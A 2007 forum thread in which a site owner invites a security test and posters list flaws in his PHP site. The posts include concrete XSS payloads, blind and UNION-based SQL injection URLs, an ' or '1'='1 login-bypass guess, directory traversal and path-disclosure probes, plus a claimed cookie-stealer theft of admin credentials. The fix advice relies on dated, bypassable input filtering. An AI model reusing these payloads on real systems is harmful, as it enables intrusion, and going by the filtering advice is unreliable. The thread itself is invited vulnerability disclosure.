BillyBoB Posted July 9, 2007 Share Posted July 9, 2007 My site is http://dreamshowstudios.net You can rate it and test it. Please do not create a username unless you plan on staying with the site. Testers please use Username:Tester Password:Helper Link to comment https://forums.phpfreaks.com/topic/59043-security-test/ Share on other sites More sharing options...
agentsteal Posted July 9, 2007 Share Posted July 9, 2007 Admin Access: I got your username and password with a cookie stealer. Array: http://www.dreamshowstudios.net/programs.php?id[] Array: http://dreamshowstudios.net/viewpic.php?full[] Cross Site Scripting: http://dreamshowstudios.net/pm.php?dignore=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.dreamshowstudios.net/programs.php?id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.dreamshowstudios.net/viewpic.php?pic="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code. Cross Site Scripting: There is Cross Site Scripting in the Shoutbox. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.dreamshowstudios.net/viewpic.php?pic=../Images/splash Drop Down Menu: If you edit the drop down menu on http://www.dreamshowstudios.net/viewpic.php you can submit arbitrary values. Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?action[] Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 245 Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 247 Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?board[] Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 198 Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg=-1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/members.php on line 116 Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg[] Fatal error: Unsupported operand types in /home/dreamsh/public_html/members.php on line 108 Full Path Disclosure: http://www.dreamshowstudios.net/pm.php?pto=Tester Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/pm.php on line 290 Full Path Disclosure: There is Full Path Disclosure in the Shoutbox. Fatal error: Cannot redeclare pagination() (previously declared in /home/dreamsh/public_html/functions.php:2) in /home/dreamsh/public_html/functions.php on line 2 Full Path Disclosure: There is Full Path Disclosure when you register. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/register.php on line 117 Includes Directory: http://www.dreamshowstudios.net/h2/ Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. Maximum Length: If you edit the input boxes in your profile you can remove the maximum lengths. PHP Source Code Disclosure: http://www.dreamshowstudios.net/backup/ PHP Source Code Disclosure: You have added deletexss('A Distraction04') to your ignorelist SQL Injection: http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=1 http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=2 SQL Injection: http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1 http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2 SQL Injection: http://www.dreamshowstudios.net/programs.php?id=3 AND 1=1 http://www.dreamshowstudios.net/programs.php?id=3 AND 1=2 Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293094 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 1) xss in the soutbox 2) http://dreamshowstudios.net/h2/ 3) messages are vulnerable to xss 4) xss in the edit profile fields. Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293095 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 blind sql injection ??? how could this happen all it does is take info from the db on that page if that actually i think it just uses the $_GET to name the dl also how do i fix the xss bug? http://dreamshowstudios.net/programs.php?id[] Unknown column 'Array' in 'where clause' what would this do?? Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293097 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 http://dreamshowstudios.net/viewpic.php?pic=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293101 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 Table 'dreamsh_dss.whatever' doesn't exist The db name is dreamsh_dss. http://dreamshowstudios.net/programs.php?id=3 UNION ALL SELECT null, null, null FROM whatever this can only get info?? Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293102 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 on forgotpass.php I think ' or '1'='1 may send the password to the first user, however I can not check... it does not give errors (so I assume it does) Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293103 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 could you give me advice on how to fix some of this? Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293104 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 your registeration system is BUGGED... it gave me email failed (or some error like that) yet the user still appears in the userlist, same thing with <script>alert("xss");</script> so limit the username length with php (server side) not something client side (htmL) Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293107 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 http://dreamshowstudios.net/h2/mod.php Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293108 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 http://dreamshowstudios.net/members.php?&pg=-1 Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293110 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 agentsteal please tell me how to fix these errors dont just notify me i have them and i thought i said dont register ..... this makes me have to go and delete... Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293111 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 Meh, you need to use stip tags... p.s. you deleted teh tester account :'( *source tears Agentsteal roflmao @ the iframe. xD Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293112 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 source could you help explain Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293114 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 Well using something like: $usern=stripslashes($usern); $usern=strip_tags($usern); $usern=mysql_real_escape_string($usern); etc (make it a function if you use it a lot) will filter the input and make it hard to xss/sql inject... Making an array and using str_replace($arrayvariable, " ", "$whattofilter") and also help if you dont want a couple different characters/words allowed (but can by bypassed) EDIT: goodnight. Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293117 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 The Tester is back up and the programs page should be fixed check please Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293118 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 how ?? Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293119 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 wait a sec...... WHY the heck are you md5ing passwords and setting them to a cookie? that's dangerous... cookie stealer could have been made and stolen your cookie, then I would have cracked it and had your password. Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293120 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 http://dreamshowstudios.net/forums/index.php?topic[] "Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 224" interesting. Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293124 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 Another Blind SQL Injection: http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1 http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2 Error fixed Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293128 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 The forums isnt custom built its a smf ... Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293133 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 Another Blind SQL Injection: http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1 http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2 Error fixed nope... Yes http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 UNION ALL SELECT null, null, null FROM whatever There lol fixed now just didnt add the var it was still $_GET Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293135 Share on other sites More sharing options...
source Posted July 9, 2007 Share Posted July 9, 2007 btw: I just tried to register the username Tester and p/w password and it said it worked... (Yeah I know you not to, but I couldn't resist.) roflmao now no one can login with tester cause I need to validate the account (but the email I used to reg was "password") xD Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293137 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 thats how its built Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293140 Share on other sites More sharing options...
BillyBoB Posted July 9, 2007 Author Share Posted July 9, 2007 You should block this directory: http://dreamshowstudios.net/programs/ done Link to comment https://forums.phpfreaks.com/topic/59043-security-test/#findComment-293142 Share on other sites More sharing options...
Recommended Posts